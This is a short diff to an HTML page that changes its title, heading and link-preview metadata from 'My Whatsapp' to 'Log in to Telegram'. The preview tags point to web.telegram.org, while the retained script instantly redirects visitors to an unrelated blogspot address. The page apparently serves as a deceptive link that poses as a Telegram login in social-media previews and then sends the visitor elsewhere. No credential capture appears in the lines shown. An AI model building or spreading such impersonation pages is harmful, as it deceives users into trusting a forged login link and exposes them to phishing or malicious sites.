--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     <meta property=fb:admin content="237344263766628" />
     <meta property=fb:locale content="en_US" />
     <meta property="og:title" content="Log in to Telegram">
-    <meta property="og:description" content="My Whatsapp">
+    <meta property="og:description" content="Log in to Telegram">
     <meta property="og:image" content="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png">
     <meta property="og:author" content="hero">
     <meta property="og:url" content="https://web.telegram.org">
@@ -21,10 +21,10 @@
     <meta property="twitter:card" content="summary_large_image">
     <meta property="twitter:image" content="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png">
     <meta property="twitter:url" content="https://web.telegram.org">
-    <title>My Whatsapp</title>
+    <title>Log in to Telegram</title>
 </head>
 <body>
-    <h1>My Whatsapp</h1>
+    <h1>Log in to Telegram</h1>
     <img src="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png" alt="Log in to Telegram">
   <script type="text/JavaScript">
 setTimeout("location.href = 'https://xfgy6563.blogspot.com/?m=1';",0);//menentukan waktu hitung dalam mili second (detik)
